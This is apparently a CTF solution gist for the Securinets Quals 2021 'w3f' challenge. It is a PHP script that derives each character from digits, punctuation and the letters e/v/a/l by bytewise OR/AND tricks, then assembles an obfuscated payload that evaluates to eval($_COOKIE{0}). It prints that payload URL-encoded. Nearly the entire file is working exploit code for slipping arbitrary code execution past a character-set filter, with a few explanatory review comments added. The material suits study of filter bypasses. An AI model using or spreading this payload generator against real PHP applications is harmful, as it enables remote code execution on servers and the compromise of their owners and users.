
@st98
Created March 21, 2021 19:21
for Securinets Quals 2k21 - w3f
<?php
// utils
/**
 * Store $v as the expression for character code $k, keeping the shortest one.
 *
 * A candidate only replaces an existing entry when it is strictly shorter, so
 * on a tie the expression that was registered first stays in the table.
 *
 * @param array  $table Map of character code => expression string (modified in place).
 * @param int    $k     Character code the expression evaluates to.
 * @param string $v     Candidate expression.
 */
function add(&$table, $k, $v) {
    $isNewCode = !array_key_exists($k, $table);
    if ($isNewCode || strlen($v) < strlen($table[$k])) {
        $table[$k] = $v;
    }
}
/**
 * Run one expansion pass over the table.
 *
 * For every ordered pair of codes already known, the bytewise OR and AND of
 * the two characters are computed and an expression for each result is handed
 * to add(), which keeps it only if it is new or shorter than what is stored.
 *
 * @param array $table Map of character code => expression string (modified in place).
 */
function go(&$table) {
    // Snapshot the codes up front: add() inserts into $table during the loops.
    $codes = array_keys($table);
    foreach ($codes as $left) {
        foreach ($codes as $right) {
            // Read the expressions on every pair, since add() may have
            // swapped in a shorter one since the previous iteration.
            $lhs = $table[$left];
            $rhs = $table[$right];

            // | and & applied to two strings operate on their bytes.
            $orCode = ord(chr($left) | chr($right));
            $andCode = ord(chr($left) & chr($right));

            add($table, $orCode, "(({$lhs})|({$rhs}))");
            add($table, $andCode, "(({$lhs})&({$rhs}))");
        }
    }
}
/**
 * Print, on one line, every printable ASCII character the table can produce.
 *
 * Codes are listed in ascending order; anything outside 0x20..0x7e is skipped.
 *
 * @param array $table Map of character code => expression string.
 */
function dump_table($table) {
    $codes = array_keys($table);
    sort($codes);

    $printable = [];
    foreach ($codes as $code) {
        $inRange = 0x20 <= $code && $code < 0x7f;
        if (!$inRange) {
            continue;
        }
        $printable[] = chr($code);
    }

    echo implode('', $printable), "\n";
}
/**
 * Translate a string into a dot-concatenation of table expressions.
 *
 * Each byte of $s is looked up by its character code, wrapped in parentheses
 * and joined to the next with `.`. A byte with no table entry is not checked
 * for here: PHP raises a warning and an empty `()` fragment is emitted.
 *
 * @param array  $table Map of character code => expression string.
 * @param string $s     Text to encode.
 * @return string Encoded expression without a trailing dot.
 */
function encode($table, $s) {
    $length = strlen($s);
    $joined = '';
    $index = 0;
    while ($index < $length) {
        $code = ord($s[$index]);
        $joined .= '(' . $table[$code] . ').';
        $index++;
    }
    // Every fragment was written with a trailing dot; drop the last one.
    return substr($joined, 0, -1);
}
// init
// $table maps a character code to a PHP expression string that evaluates to
// that one character. Insertion order matters: add() keeps the earlier entry
// when two expressions have the same length.
$table = [];

// 0-9: "(d).(0)" is the two-character string "d0"; offset 0 is the digit.
foreach (range(0x30, 0x39) as $code) {
    $table[$code] = '((' . chr($code) . ').(0)){0}';
}

// Characters picked out of number-to-string conversions and bare constants.
// NOTE(review): these forms depend on PHP 7.x semantics - the {n} string
// offset syntax and the undefined-constant fallback were removed in PHP 8.0,
// and 1/0 throws DivisionByZeroError there instead of yielding INF.
$seeds = [
    '.' => '((0.1).(0)){1}',          // "0.10"
    '-' => '(((-1).(1)){0})',         // "-11"
    '+' => '(((10**19).(1)){4})',     // 10**19 exceeds the int range and prints as a float
    'E' => '((10**19).(0)){3}',
    'I' => '(((1/0).(1/0)){0})',      // "INFINF"
    'N' => '(((1/0).(1/0)){1})',
    'F' => '(((1/0).(1/0)){2})',
    'e' => '((_e){1})',               // bare constant _e read as the string "_e"
    'v' => '((_v){1})',
    'a' => '((_a){1})',
    'l' => '((_l){1})',
];
foreach ($seeds as $char => $expr) {
    $table[ord($char)] = $expr;
}

// make table
// Two passes: the second combines the characters the first pass derived.
go($table);
go($table);
// yay
// Fill the template's placeholders with their encoded forms. Once the pieces
// are concatenated the inner expression spells out `eval($_COOKIE{0});`; the
// bare `_` in the template supplies the underscore.
// The result contains only digits, punctuation and the letters e/v/a/l.
// NOTE(review): presumably the challenge filtered input by character set before
// eval(); a filter of that kind does not limit what the evaluated expression can
// compute, so untrusted input must not reach eval() at all.
// encode() emits an empty `()` with a warning for any character go() did not
// derive, so check the run for warnings before trusting the printed string.
$payload = 'eval((START.DOLLAR._.COOKIE.POYO.END))';
$placeholders = [
    'DOLLAR' => '$',
    'COOKIE' => 'COOKIE',
    'POYO'   => '{0}',
    'START'  => 'eval(',
    'END'    => ');',
];
foreach ($placeholders as $marker => $plain) {
    // Table expressions contain neither `$` nor `\`, so a literal replace
    // gives the same text as the regex-based one.
    $payload = str_replace($marker, encode($table, $plain), $payload);
}

$len = strlen($payload);
echo "length: {$len}\n$payload\n";
echo urlencode($payload) . "\n";